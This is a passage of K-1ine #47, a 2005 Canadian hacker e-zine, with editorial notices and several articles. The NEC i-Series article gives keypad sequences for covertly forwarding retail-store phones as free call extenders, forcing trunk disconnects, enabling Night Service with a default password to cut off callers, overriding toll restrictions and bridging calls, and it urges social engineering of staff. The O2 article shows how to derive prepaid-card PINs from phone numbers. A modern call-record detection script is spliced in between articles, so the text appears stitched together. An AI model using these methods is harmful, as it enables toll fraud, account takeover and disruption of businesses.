[ASCII art banner, signed "cyb"]

SIX F*CKING YEARS
** SPRING 2005 **

O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O

randOm wOrds

  Introduction ................................................ The Clone
  Contact Information ......................................... The Clone
  Link of the Quarter ......................................... The Clone
  K-1ine Mirrors .............................................. The Clone
  Nettwerked Radio ............................................ The Clone
  780 Records Corp ............................................ The Clone
  Voodoo Magick Boxes ......................................... The Clone
  K-1ine Goes Wheneverly ...................................... Nettwerked

dOcuments

  O2 - PREPA1D CARD P1N PHREAK1N F0R THE MASSES ............... Acid Data
  Phreaking the NEC i-Series phone systems .................... War
  West Ed Mall Wifi Scan: Revisited ........................... Fr0st
  Undressing Cryptography ..................................... Aestetix
  The Guide to Using Google to Get Free Confz ................. Aftermath
  The Inevitable Crash of Society ............................. Cyburnetiks
  Datapac Hacker's Kit: DataCrack Source Code ................. Aftermath
  Datapac Hacker's Kit: DataSkan Source Code .................. Aftermath
  If I Were President ......................................... DoobieEx
  Awstats exploit "shell" ..................................... Omin0us
  How to brute force MSSQL .................................... H4v3n
  SQL Brute Source Code ....................................... H4v3n

cOnclusiOn

  Credits ..................................................... The Clone
  Shouts ...................................................... The Clone

O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O

Introduction:

It was May 22nd 1999 and K-1ine magazine had survived its one month anniversary. A new idea of mine had spawned out of boredom, and I felt it was time to test it out. That idea was Nettwerked. The idea was that Nettwerked would, over time, act as this country's top Internet phone phreaking resource. At this point Nettwerked was nothing but a few low-tech hacking articles, some of my own hand scans, and a few miscellaneous articles I wrote on telecom systems. It wasn't much but it definitely was better than the unbearable "boxing" sites with ripped off articles from LOD (Legion of Doom) technical journals. One thing I definitely didn't want was to make Nettwerked one of those sites. They lacked originality, creativity, and quite frankly A FUCKING CLUE about the current (POTS/VOIP) telephone networks.

Nettwerked soon grew with my own wacky and wild phreaking articles, and naturally the outside contribution of phreaking articles to this site also grew. Before I knew it Nettwerked filled itself with over 100 telecommunications related articles, forty-something issues of K-1ine Magazine, Elcotel Research (an insanely large research project into Elcotel-based COCOT Payphones), Flex Technology Research, a popular discussion board, a monthly Nettwerked Meetings page, and a weekend Radio Show.

It's been 6 years. This love child of mine, Nettwerked, has had its growing pains, was nearly shut down after fears (see: paranoia) of a post-Bush New World Order (thanks H410g3n for convincing me it was a bad idea), and has grown into a large community of friends who share a common goal; learning as much as possible about technology - at all costs.

Thank you to everyone who has made this dream into a reality.
I look forward to sharing another 6 years and more with you all through Nettwerked, K-1ine, Hack Canada, and any other Internet project/site that may just happen to pop up in the future.

Remember though, all of this is only made possible by contribution. Without people giving a shit Nettwerked would cease to exist. Contribute your original files to Nettwerked/Hack Canada/K-1ine, contribute your original music to Nettwerked Radio, discuss technology on the discussion board, come to our meetings, buy a Voodoo Magick Box, link to the web-site. That is how *you* support our thriving Canadian H/P scene!

Enjoy the Spring Issue of K-1ine (#47)... Six F*cking Years!

Power to the people.

-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O

Contact Information;

|*> Comments/Questions/Submissions: theclone@hackcanada.com
|*> Check out my site: (Nettwerked) http://www.nettwerked.net
|*> Check out the Web-forum: http://board.nettwerked.net/

-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O

Link of the Quarter:

Every quarter I post one really great "link of the quarter" on each issue of K-1ine magazine. The link can be anything in the technology industry, music scene, rave scene, punk scene, or even a good article you read on a news site. I'll be taking submissions via e-mail or IRC right away; so get your links in and maybe you'll see it in the next issue of K-1ine!

For the Spring 2005 issue of K-1ine, the link of the quarter is:

http://www.phreakvidz.com

Featuring full length telephone phreaking videos such as Kevin Poulsen on 'Unsolved Mysteries', 'Central Office Tour Video', and lastly the Masters of Deception's 'Phiber Optik' in a documentary called 'Unauthorized Access'.
Submitted by: The Clone

-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O

K-1ine Magazine Mirrors:

WIRETAPPED

"Wiretapped.net is an archive of open source software, informational textfiles and radio/conference broadcasts covering the areas of network and information security, network operations, host integrity, cryptography and privacy, among others. We believe we are now the largest archive of this type of software and information, hosting in excess of 20 gigabytes of information mirrored from around the world."

Now mirrored in two places, one in Belgium and another in Sydney.

http://www.mirrors.wiretapped.net/security/info/textfiles/k1ine/

HACK CANADA

"Hack Canada is the source for Canadian hacking, phreaking, freedom, privacy, and related information."

http://www.hackcanada.com/canadian/zines/k_1ine/index.html

SECURITY-CORE

"Security-Core mirrors K-1ine.. and that's about it so far."

http://security-core.com/modules.php?op=modload&name=Downloads&file=index&req=viewdownload&cid=5

.: (.dtors) :.

"we look good... in our new town" - Omin0us' Security website

http://dtors.ath.cx/index.php?page=k1ine

-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O

Nettwerked Radio (Undergr0und Radio and Music every weekend!):

Tune into this critically acclaimed radio show on: Saturday and Sunday from: 12:00am - 3:00am (MST).

To listen, please tune in to: http://68.151.33.191:8000/listen.pls

If you're not sure whether the show is on, just visit nettwerked.net, and look at the Radio section. If you see lime green "ONLINE", then we are live. You can listen in using Winamp, XMMS, or anything that will play Winamp streaming audio. We thank you for your support and hope that you tune in, give your feedback, and make those requests!

--------------------------------------------------------
Contribute your music to Nettwerked Radio, and be heard:
--------------------------------------------------------

Do you have your own band?
Are you a solo artist? Do you make your own music on your computer, or with regular instruments? Be heard! Nettwerked Radio, on from 12AM-3AM (MST) every Saturday and Sunday, is now accepting submissions of YOUR original music for play. We accept MP3 or OGG formats. If you submit your music, be sure to include information on the band, and any information; such as location, and history. Nettwerked Radio will play your music and advertise your artist information! Nettwerked Radio is a great way to be heard without having to pay out for advertising, or passing out flyers, etc.

We respect your copyright too. We will only play your songs when you want them played. We will not duplicate, share or otherwise pirate your songs.

All interested artists please send your music and information to: the.clone@gmail.com

For more information visit: http://www.nettwerked.net/radio/

-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O

780 Records Corporation... from the people who brought you Nettwerked Radio.

780 Records Corporation is a 100% independent record label focused on helping independent, signed and unsigned artists get a voice. We are helping artists who produce music in various genres (punk, rock, electronic, etc.) sell and distribute their music to the global scene.

At 780 Records Corporation we believe strongly in an artist's ability to make a living, and control their music. This is a challenging thing in a world where large music labels do the exact opposite. As a record label, we will promote your music, your CDs, and more. Our contracts plan to be about freedom for the artist (unlike many of the large labels you see out there who control the lives of the artists), and about being heard. Nothing is more important to us than that.

We have unofficially adopted Google's famous business slogan: "Don't be evil". We feel "Don't be evil" is not only an important part of business, but an important part of life in general.
780 Records Corporation is also a supporter of 'Downhill Battle', a non-profit organization working to support participatory culture and build a fairer music industry. We plan to contribute free banner space, and donations to this very important organization who really do help independent artists across the globe. (Downhill Battle is available at: http://www.downhillbattle.org)

For more information on 780 Records, or to find out how you can be a part of 780 Records visit: http://780.digaserve.com (soon to be http://www.780Records.com).

-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O

Voodoo Magick Boxes:

Voodoo Liquidation! - Nettwerked.net is pleased to announce the return of the Voodoo Magick Boxes! We are selling off the last of these fine machines, and with a fine price tag. We're selling for 50% less than their original cost!

Buy a Voodoo Machine now: http://www.nettwerked.net/voodoo.html

Price: $50.00 (US) + $12.00 (US) shipping.

We accept PayPal as a main form of payment, but we also accept Paystone as a payment processor. For questions, please contact: theclone@hackcanada.com.

Thank you for your interest in this incredible "wetware" product, and we hope you purchase one soon.

-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O

Nettwerked.net: K-1ine magazine goes wheneverly

[ For Immediate Release ]

Thursday, May 12, 2005: - Edmonton, Alberta --

In a decision that is sure to make headlines; Nettwerked has announced that 'K-1ine', Canada's longest running hacker, phreak, electronics, and political magazine has been turned into one that will now be published wheneverly.

In its beginning, K-1ine initially started out as a magazine that was released whenever its only editor and major writer, The Clone, had the time to piece the beautiful ascii art filled digital pages with everything that an underground publication should have.
However, after approximately one year, K-1ine quickly grew into a magazine that had many contributing writers and artists, so The Clone decided that keeping K-1ine as a release that came out rarely certainly was not going to cut it for his readers. He wanted to have something that all HackCanada.com / Nettwerked.net visitors could look forward to once a month. So in July of 2000, K-1ine turned into a monthly release, and stayed that way until three years later in the summer of two-thousand and three when K-1ine went quarterly.

And now it seems we have to go wheneverly. What does that mean? It means we'll release issues whenever we feel we have received an acceptable amount of article submissions. Why? Well in the past several months it has become increasingly difficult to gather enough high quality articles within a quarter to justify a K-1ine release. We feel this is the only way we can keep K-1ine from going under. Much like Phrack Magazine in the United States eventually did, K-1ine will most likely have 'zine issue releases once or twice a year after the Spring 2005, K-1ine #47 release. We hope with this more laid back approach to K-1ine, we can make K-1ine even more high quality, and of course more special.

Starting after #47, K-1ine will follow the newly implemented wheneverly format, and will contain all the great articles and stories that you've grown to love from the magazine that changed the face of the Canadian hacking / phreaking scene forever. With the gathering of issues over a longer period of time, we hope this means K-1ine's wheneverly releases are much larger, and more elite than the previous quarterly issues.

Upcoming Issues:

* Whenever 200X: K-1ine 48
* Whenever 200X: K-1ine 49
* Whenever 200X: K-1ine 50 (50TH ANNIVERSARY ISSUE - promotional items included)

Sincerely,

The Clone (Editor-In-Chief)

--

Forward Looking Statements:

The Nettwerked.net website contains forward looking statements that are based upon current expectations.
Actual results could differ materially from those projected in the forward looking statements as a result of various risks and uncertainties including, among others, the timely introduction and acceptance of new products, costs associated with new product introductions, the transition of products to new hardware configurations and platforms and other factors, including those discussed in Nettwerked's annual and quarterly reports on file with the Kanada R3venue /\gency. This information should be read in conjunction with Nettwerked's most recent Registration Statement on phile with the Kanada R3venue /\gency, which contain a more detailed discussion of Nettwerked's business including risks and uncertainties that may affect future results; such as the fucking apocalypse. Nettwerked does not undertake to update any forward looking statements, because quite frankly we are lazy.

This document is Copyright (c) 2005, Nettwerked. All Rights Preserved in M.S.G.

###

-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O

bbiab, things to do, people to screw family?

a c i d d a t a . n e t   p r e s e n t s

[ O2 - PREPA1D CARD P1N PHREAK1N F0R THE MASSES ]

 _____________
|  ___        |
| |___|   O2  |
|___________/     O2 can do ..

[ Intro ]

A few weeks ago I bought a new o2 ( o2-online.de ) prepaid card. I deliberated if it is possible to get the pin from my phone number and I looked a while on my number and after a while I saw something interesting.

[ Pin & phonenumber ]

I add the two last 3-digit numbers together and after this I got a 4-digit number - my pin. Here is the simple turn: ( with a changed phonenumber just for example )

  the number: 0176 12 424 754
  add it:     424 + 754
  the pin:    1178

[ Last words ]

I don't know if this is a coincidence but I don't believe that. Anyway the two 3-digit numbers, when you add them, must become a 4-digit number so the range of numbers in this case is minimal.
O2 also have different numbers like 0179 and so on as prefix number with other different simple ways maybe, I don't know.. phreak it out and change your pin. (-;

[ Greetings ]

Greetings are going out to Security-AG, Koksclan.de, sm0g23er, Simoni, Jay-K, D-Nought and all my other good friends.

a c i d d a t a . n e t   2 0 0 5

-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O

i caused an accident once in your pants

Phreaking the NEC i-Series phone systems
by war

The i-Series of desktop fones are manufactured by NEC. The i-Series includes the 28i, 124i and 384i phones. These phones were built by NEC for use in an office environment, and they perform satisfactorily in that role. NEC i-Series phones are used by a number of small and large businesses in North America.

This article might, possibly, hopefully, give you some insight into power-use (or phreaking, whatever) of the i-Series fones. That's the idea, anyways. I'm assuming a previous basic knowledge of how PBX systems work.

The i-Series phones have quite a large array of features, too large to explain every feature in detail in one article. A quick overview of some of the i-Series features:

  Alarm
  Automated Attendant (Voice Announcer)
  Background Music
  Barge In (Emergency Interrupt-ish)
  Call Forwarding
    Follow-me
    Off-Premise
    DND Override
  Call Waiting/Camp On
  Conferencing
    MeetMe Internal/External Conferencing
    MeetMe Internal/External Paging
  Directory Dialing
  Internal/External Paging
  Programmable Function Keys
  Soft Keys (on select models)
  Reverse Voice Over
  Room Monitoring
  Tandem Trunking
  Voice Mail

Physical Access

As the topic says, let's first assume you have physical access to the actual phone. So, you may ask, "How do I gain physical access?" It's not that hard, really. If you spot an i-Series phone in a shop, you could simply ask them, "Can I use your phone?" It's not hard. So. Let's look at a couple useful features of the wonderful i-Series fone system.
Call Forwarding

Probably one of the most useful (in-my-opinion) options on the i-Series phones is the "Call-Forwarding" feature and Call-Forwarding Off-Premise feature. The i-Series phones have quite a few options when it comes to call-forwarding. You can forward your calls to voicemail, forward your calls to another extension, or forward to an external number. Call-forwarding also ties in with the Do-Not-Disturb (DND) functions of the phone.

Call-Forwarding

There are a couple call-forwarding modes. They are:

  Call-Forwarding when Busy or Not-Answered
  Call-Forwarding Immediate
    - immediately forwards your call using the given method without ringing the line at all
  Call-Forwarding when Not Answered
  Call-Forwarding Immediate with Both Ringing
    - immediately forwards your call using the given method, but still rings your line.
  Call-Forwarding to Voice Mail

If you needed to activate call-forwarding on an i-Series phone (once again assuming physical access), simply dial:

  1. [*] + [2]
  2. Dial Call Forwarding condition:
       1 - VoiceMail
       2 - Busy or Not Answered
       4 - Immediate
       6 - Not Answered
       7 - Immediate with Both Ringing
       0 - Cancel Call-Forwarding
  3. Then dial the extension, Voice Mail master number, or simply press the [Voice Mail] programmable key (if there is one.)
  4. Dial Call Forwarding Type
       2 - All calls
       3 - Outside calls only
       4 - Intercom calls only

So, overall, if you wanted to say...forward all your calls immediately to extension 555, you would dial:

  [*][2] + [4] + [5][5][5] + [2] + hangup

Call-Forwarding Off-Premise

Call-Forwarding Off-Premise can be used to forward your calls to another number. There are quite a few different ways to exploit this feature, assuming local access at an i-Series fone.

To turn on Call-Forwarding Off-Premise, dial:

  1. [*] + [2]
  2. [6] + Dial line access code
     {
     Line access codes are:

     [9] Automatic Route Selection (ARS) / Trunk Group Routing
       Dialing "9" for an outside line is probably the most common way known by people using PBX systems to get an outside line. "9" is the extension commonly designated for Automatic Route Selection - the fone system chooses what line you are going to use for you.

     [8][0][4] + Line Group (1-9 , 01-99, 001-128)
       804x dialing is Line Group Selection dialing. You can manually select the outgoing trunk group that you want your call to be placed via. For example, if there is more than one business in your office, you might have a trunk group "1" for the "ABC Packaging Corp", and a trunk group "2" for the "BCD Shipping Co." If you were calling out using "9" on a phone belonging to the "BCD Shipping Co.", you would be actually dialing "8042". That would route you onto the BCD Shipping Co. trunk group. But, you could also theoretically dial "8041" to make an outgoing call over the trunk group assigned to ABC Packaging. (I hope that makes sense).

     [#][9] + Line Number Selection
       You can select an absolute line using "#9". You could dial "#9" + "05" to get line number 05.
     }
  3. Then dial the external number where you want your calls to be forwarded.
  4. Hangup.

Call-Forwarding Off-Premises is a quick-n-dirty way to get an overnight extender. If you were to walk up to a Future Shop employee, and ask them to use their phone, you might be able to set it to Call-Forward Off-Premises. But, chances are that it would be noticed the next day. If you want to maximize the length of time before the Call-Forwarding is removed, there are options to be considered.

Forward to the Operator.
If you're forwarding to the operator, and then getting him/her to place the call, you aren't going to be endangering your favorite bridge or your friend.

Find a remote phone that rarely receives calls.
In large retail outlets (Future Shop, Best Buy, Canadian Tire, etc) there are often departments that are lower traffic than others. For example, appliances. How many people go to Future Shop to buy appliances? None, you say? Well then, if you're going to pick a fone to set up as an extender, might I suggest you use a phone in the appliance department? Chances are, it's going to receive less traffic which means less chance of your extender getting taken down.

+++

Forced Trunk Disconnection

While still on the physical access topic...Force Trunk Disconnection. If for any unknown reason, you needed to release a line, simply dial up the line using:

  [#][9] + line number (ie 01, 02, 03, 005, whatever) + [*][3]

That will disconnect (read abruptly terminate) the connection. I'm sure you can figure out a good use for that.

+++

Night Service Mode

Ever find a nice afterhours voicemail system that you just can't wait until the evening to play with? Even if it means cutting off legitimate users? No, me either. But, with Night Service Mode, you can do just that. Switching to Night Service Mode during the daylight hours, especially in a busy store, usually makes incoming callers upset. People calling in get voicemail. And such. But, it's a convenient (for you) way in a pinch to get access to an afterhours system.

To physically turn on Night Service Mode from a phone, just dial:

  1. [8][1][8] + Night Service Password
     The default Night Service Password is "0000".
  2. Dial the Night Service Mode
       0 Day mode
       1 Night mode
       2 Midnight mode
       3 Rest mode
       4 Day 2 mode
       5 Night 2 mode
       6 Midnight 2 mode
       7 Rest 2 mode

So, to turn on Night Service Night Mode during the day at your (least?) favorite local Staples (or whatever uses i-Series) simply dial:

  [8][1][8] + [0][0][0][0] + [1]

That is, of course, assuming the password is default.

+++

Outgoing Calls

Some i-Series phone systems have toll restrictions.
To override toll restrictions, simply dial:

  [8][7][5] + Password

As well, some systems that use ARS (Automatic Route Selection) are coded. Many larger companies like Nortel that have high volumes of calling often code their PBX systems so that calls can be catalogued effectively, and to discourage over-use and fraudulent use. If the system you are using is using coded ARS, when you dial "9", you'll get a dialtone and can dial your number as normal. But, after you have dialed the number, you will be dropped to another dialtone and will have to enter the ARS code.

+++

Bridging and Social Engineering

Bridging is the act of placing two outside callers in a conference call, and then dropping out of the call. Let's say that two of your phreak buddies decide that they want to talk. But, maybe they don't want to pay for it. Simple enough. You just walk down to your local K-Mart, and find a remote phone. Then, wait for one of your buddies to call up the local K-Mart's 800 number and ring your phone. When he does, simply press the [Conf] button on your i-Series phone. Then, wait for your second buddy to ring your line. When he does, press [Conf] twice. This will connect the two parties. To drop out of the conference and leave the two parties talking, simply press [HOLD] + [#][8].

Now on the other side of the coin. Many companies set up tandem trunking conferences to allow outside employees such as service technicians or other field workers to talk to each other. You could social engineer a secretary into creating a bridging line to talk on. If she doesn't know how, now you can walk her through it, since you know. Many secretaries also refer to bridging conferences as "Tandem Conferences", "Tandem Trunking Lines", or something similar to that.

[ BlackRatchet wants to remind you that a 'Tandem Trunking Line' is not a technical term. A trunk and a line are different. Not the same. He really, REALLY wanted me to note that. So here it is. ]

+++

That's about it.
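A defender-side check for the patterns this article relies on (off-premise forwarding left on as an extender, trunk-to-trunk bridging, and Night Service switched on during opening hours), added here as an example that is not part of the original article or of NEC's software. The CSV call-record layout, field names, opening hours, threshold and sample rows are all constructed assumptions; a real PBX exports its call records in its own format.

```python
import csv
import io
from collections import Counter, namedtuple
from datetime import datetime

# Constructed sample records. The column layout is a hypothetical export format
# chosen for this example; it is not NEC's SMDR output.
#   kind: IN   = outside call answered at an extension
#         OUT  = extension placed an outside call
#         FWD  = outside call sent back out by an extension's forwarding setting
#         CONF = conference whose remaining parties are both on outside trunks
#         MODE = service mode changed from an extension ("dialed" = new mode digit)
SAMPLE_CDR = """\
timestamp,kind,extension,in_trunk,out_trunk,dialed,duration_s
2005-05-10 09:14:02,IN,210,01,,,184
2005-05-10 09:40:31,OUT,210,,03,7805550100,62
2005-05-10 13:05:47,MODE,318,,,1,0
2005-05-10 13:06:10,IN,318,02,,,15
2005-05-10 21:12:09,FWD,318,02,04,7805550123,2710
2005-05-10 23:48:55,FWD,318,01,04,7805550123,3904
2005-05-11 02:17:30,FWD,318,02,03,7805550123,1822
2005-05-11 11:30:00,CONF,225,01,02,,2405
2005-05-11 18:30:12,MODE,200,,,1,0
"""

BUSINESS_HOURS = range(8, 18)   # assumed opening hours, 08:00-17:59
DAY_MODES = {"0", "4"}          # "Day" and "Day 2" in the article's mode list
FWD_THRESHOLD = 3               # repeated forwards to one number before alerting

Finding = namedtuple("Finding", "rule extension detail")


def parse_records(text):
    """Parse the CSV export into dicts with typed timestamp and duration."""
    rows = []
    for row in csv.DictReader(io.StringIO(text)):
        row["timestamp"] = datetime.strptime(row["timestamp"], "%Y-%m-%d %H:%M:%S")
        row["duration_s"] = int(row["duration_s"] or 0)
        rows.append(row)
    return rows


def detect(records):
    """Return a list of Finding tuples for the three rules below."""
    findings = []
    forwards = Counter()
    for r in records:
        ts = r["timestamp"]
        # Rule 1: both legs are outside trunks, so the PBX is relaying a call
        # between two outside parties (forwarding off-premise or a bridge).
        if r["in_trunk"] and r["out_trunk"]:
            detail = f"{ts} in={r['in_trunk']} out={r['out_trunk']} {r['duration_s']}s"
            findings.append(Finding("trunk_to_trunk", r["extension"], detail))
            if r["kind"] == "FWD":
                forwards[(r["extension"], r["dialed"])] += 1
        # Rule 2: a non-day service mode selected while the business is open.
        if (r["kind"] == "MODE" and ts.hour in BUSINESS_HOURS
                and r["dialed"] not in DAY_MODES):
            findings.append(Finding("daytime_mode_change", r["extension"],
                                    f"{ts} mode={r['dialed']}"))
    # Rule 3: one extension keeps forwarding outside calls to the same number,
    # which is what a forwarding setting left in place looks like in the records.
    for (ext, number), count in sorted(forwards.items()):
        if count >= FWD_THRESHOLD:
            findings.append(Finding("persistent_offprem_forward", ext,
                                    f"{count} calls to {number}"))
    return findings


if __name__ == "__main__":
    for f in detect(parse_records(SAMPLE_CDR)):
        print(f"{f.rule:28} ext {f.extension}  {f.detail}")
```

The same three settings are the ones to review on the switch itself: the Night Service password left at the default "0000", off-premise forwarding allowed from floor phones, and conferences that stay up with only outside parties on them.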
-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O

what the FUCK is a sex token??/ you're too young! cover eyes lol * Cygnus opens eyes!! hehe Cygnus: for peep shows, et al Cygnus - it's when a mommy loves a daddy and he puts his bird into her bee lol clone, stfu

################################################
#                                              #
#  West Ed Mall Wifi Scan: Revisited           #
#  Article By: fr0st                           #
#  Original Article By: cybersk4nk             #
#  Contact Info: fr0sty (at) shaw (dot) ca     #
#  http://blondebomber.no-ip.com               #
#                                              #
################################################

After reading the original article by cybersk4nk, I knew I had to do a follow up so here it is.

The Story:

I decided to start my adventure of the war walk in Starbucks that is located in and beside Chapters in West Edmonton Mall. Sitting in the Starbucks gave me a little time to get everything working and everything set up. So I put my laptop into my bag and off I went.

The Setup:

The laptop I was using for this WiFi scan was an IBM ThinkPad T21, running FreeBSD 5.3, Kismet 2005 01 R1, with a prism2.5 SMC2532W-B. The SMC2532W-B is a 200mW card, and let me tell you, this card packs a lot of power.
The Results: Network 1: "3dbcamwireless" BSSID: "00:40:05:55:17:45" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 08 WEP : "Yes" Maxrate : 22.0 LLC : 2 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 2 First : "Wed Mar 30 05:15:41 2005" Last : "Wed Mar 30 06:02:12 2005" Network 2: "5356ep" BSSID: "00:0F:C8:00:15:13" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 11 WEP : "Yes" Maxrate : 36.0 LLC : 5 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 5 First : "Wed Mar 30 05:17:26 2005" Last : "Wed Mar 30 06:02:10 2005" Network 3: "linksys" BSSID: "00:0F:66:90:CE:9A" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 06 WEP : "Yes" Maxrate : 0.0 LLC : 3 Data : 1 Crypt : 1 Weak : 0 Dupe IV : 0 Total : 4 First : "Wed Mar 30 05:17:28 2005" Last : "Wed Mar 30 05:46:38 2005" Network 4: "linksys" BSSID: "00:0E:35:79:D0:DE" Type : unknown Carrier : 802.11b Info : "None" Channel : 00 WEP : "No" Maxrate : 18.0 LLC : 1 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 1 First : "Wed Mar 30 05:17:29 2005" Last : "Wed Mar 30 05:17:30 2005" Network 5: "" BSSID: "00:06:B1:14:3C:AB" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 06 WEP : "No" Maxrate : 11.0 LLC : 17 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 17 First : "Wed Mar 30 05:17:32 2005" Last : "Wed Mar 30 06:03:44 2005" Network 6: "111" BSSID: "00:0F:66:D6:5C:FC" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 06 WEP : "Yes" Maxrate : 54.0 LLC : 8 Data : 1 Crypt : 1 Weak : 0 Dupe IV : 0 Total : 9 First : "Wed Mar 30 05:18:34 2005" Last : "Wed Mar 30 06:04:34 2005" Network 7: "GdbuzzAP" BSSID: "00:09:5B:AA:07:A8" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 10 WEP : "Yes" Maxrate : 0.0 LLC : 2 Data : 1 Crypt : 1 Weak : 0 Dupe IV : 0 Total : 3 First : "Wed Mar 30 05:18:50 2005" Last : "Wed Mar 30 06:05:08 2005" Network 8: "" BSSID: "00:06:B1:14:44:EF" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 02 WEP : 
"No" Maxrate : 11.0 LLC : 25 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 25 First : "Wed Mar 30 05:19:02 2005" Last : "Wed Mar 30 06:08:26 2005" Network 9: "linksys" BSSID: "00:06:25:98:7A:0C" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 06 WEP : "Yes" Maxrate : 11.0 LLC : 15 Data : 1 Crypt : 1 Weak : 0 Dupe IV : 0 Total : 16 First : "Wed Mar 30 05:20:39 2005" Last : "Wed Mar 30 06:08:37 2005" Network 10: "default" BSSID: "00:0D:88:2F:F1:A7" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 03 WEP : "Yes" Maxrate : 11.0 LLC : 4 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 4 First : "Wed Mar 30 05:24:05 2005" Last : "Wed Mar 30 05:37:06 2005" Network 11: "151" BSSID: "00:A0:F8:46:6A:BB" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 01 WEP : "Yes" Maxrate : 11.0 LLC : 5 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 5 First : "Wed Mar 30 05:24:49 2005" Last : "Wed Mar 30 05:35:44 2005" Network 12: "WEMiSphere" BSSID: "00:0F:C8:00:15:28" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 01 WEP : "No" Maxrate : 36.0 LLC : 9 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 9 First : "Wed Mar 30 05:25:19 2005" Last : "Wed Mar 30 05:35:52 2005" Network 13: "FLHGuest" BSSID: "00:0F:C8:00:15:29" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 01 WEP : "No" Maxrate : 36.0 LLC : 9 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 9 First : "Wed Mar 30 05:25:20 2005" Last : "Wed Mar 30 05:35:50 2005" Network 14: "WEM_Conference" BSSID: "00:0F:C8:00:15:2A" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 01 WEP : "No" Maxrate : 36.0 LLC : 9 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 9 First : "Wed Mar 30 05:25:20 2005" Last : "Wed Mar 30 05:35:50 2005" Network 15: "SMC" BSSID: "00:04:E2:94:5E:14" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 06 WEP : "No" Maxrate : 11.0 LLC : 1 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 1 First : "Wed Mar 30 05:26:15 
Total Networks Found: 62

This is my first article for K-1ine, I hope you all enjoyed.

-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O

"9/10 doctors use Windows. When life support is on the line; who cares?
 Risks make life fun" - A message from the Government of Canada

                  +-----------------------------------+
                  |      Undressing Cryptography      |
                  |               ~or~                |
                  |     How I learned to punt Eve     |
                  |        and strengthen DES         |
                  |                                   |
                  |            by aestetix            |
                  +-----------------------------------+

This is a continuation of my article "Dismantling DES" which appeared in
K-1ine #44, and I'll be making certain assumptions about the reader's
knowledge of the algorithm and cryptology vocabulary.

When we left off from the first article, we made several sore assumptions:
thinking that the only noteworthy attribute of the key is its length, that
the existence of substitution boxes (s-boxes) is enough to guarantee their
security, and that multiple iterations alone fasten the resilience of the
algorithm. While we did explore the EFF project attacking DES's strength, we
rested with satisfaction that key brute forcing was the only effective
technique. In essence, we ignored any practical philosophies that
cryptanalysts might use in crypto-assault.

-------------------+
 Death to the Keys!|
-------------------+

First, let's examine the structure of keys in general. We can think of them
in similar fashion to passwords: how many tricks are there to securing your
password, and how many people actually use them? We have alphanumeric
suggestions, as well as case sensitivity using non-Roman characters, but
there are two harsh realities: people don't like remembering complex globs of
crap when they just want to do their work (or play), and schools or companies
enforcing militant password regulations tend to have escrows of keys
following the same format (dictionary word + number is common).

How does this relate to key structure in a crypto algorithm? Well, if you
are using keys composed of ASCII characters, there's usually a slim window
within which the key will be found. For example, if your keys are all letters
and numbers, you can set a brute-force analyzer to scan within the range of
0x30 and 0x7F. This alone eliminates nearly 30% of your spectrum. Second,
there are certain patterns in key structure that will probably not occur.
Would anyone prudently structure a key with repetitions like 0x5656565656?
Even interlacing key combinations like 0x1F2E3D4C5B probably won't occur. The
more ignorable patterns you can observe, the more efficient your key scanner
will be.

--------------------------+
 The "S" stands for "sexy"|
--------------------------+

Second, we have s-boxes. Before we run into analysis of s-box architecture,
we need to introduce the "avalanche" concept. When we think of cause-effect
